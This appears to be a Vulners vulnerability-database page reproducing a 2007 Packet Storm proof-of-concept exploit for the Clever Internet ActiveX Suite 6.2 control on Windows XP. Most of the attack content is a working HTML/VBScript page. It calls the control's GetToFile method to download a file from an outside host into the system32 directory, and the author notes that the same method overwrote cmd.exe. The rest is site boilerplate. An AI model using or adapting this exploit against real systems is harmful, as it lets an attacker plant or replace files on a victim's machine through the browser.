Lucene search

K

clever-overwrite.txt

🗓️ 26 Jul 2007 00:00:00Reported by shinnaiType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Clever Internet ActiveX Suite 6.2 arbitrary file download/overwrite exploit on Windows XP

Show more

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

Code
`<pre>  
<code><span style="font: 10pt Courier New;"><span class="general1-symbol">-------------------------------------------------------------------------------------------------  
<b>Clever Internet ActiveX Suite 6.2 (CLINETSUITEX6.OCX) Arbitrary file download/overwrite Exploit</b>  
url: http://www.clevercomponents.com/home/news.asp  
  
author: shinnai  
mail: shinnai[at]autistici[dot]org  
site: http://shinnai.altervista.org  
  
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7  
all software that use this ocx are vulnerable to this exploits.  
  
<b>This control is marked as  
RegKey Safe for Script: True  
RegKey Safe for Init: True  
Implements IObjectSafety: True  
IDisp Safe: Safe for untrusted: caller, data  
IPStorage Safe: Safe for untrusted: caller,data</b>  
  
Using the "GetToFile" method, you can download everything you want on a pc. This  
exploit just download a txt file on pc, I try to overwrite cmd.exe and it works.  
-------------------------------------------------------------------------------------------------  
  
<object classid='clsid:E8F92847-7C21-452B-91A5-49D93AA18F30' id='test' ></object>  
  
<input language=VBScript onclick=tryMe() type=button value="Click here to start the test">  
  
<script language='vbscript'>  
Sub tryMe()  
  
test.GetToFile "http://www.shinnai.altervista.org/shinnai.txt" ,"c:\windows\system32\shinnai.txt"  
MsgBox("Exploit completed!")  
  
End Sub  
</script>  
  
</span>  
</code></pre>  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo
26 Jul 2007 00:00Current
7.4High risk
Vulners AI Score7.4
22
.json
Report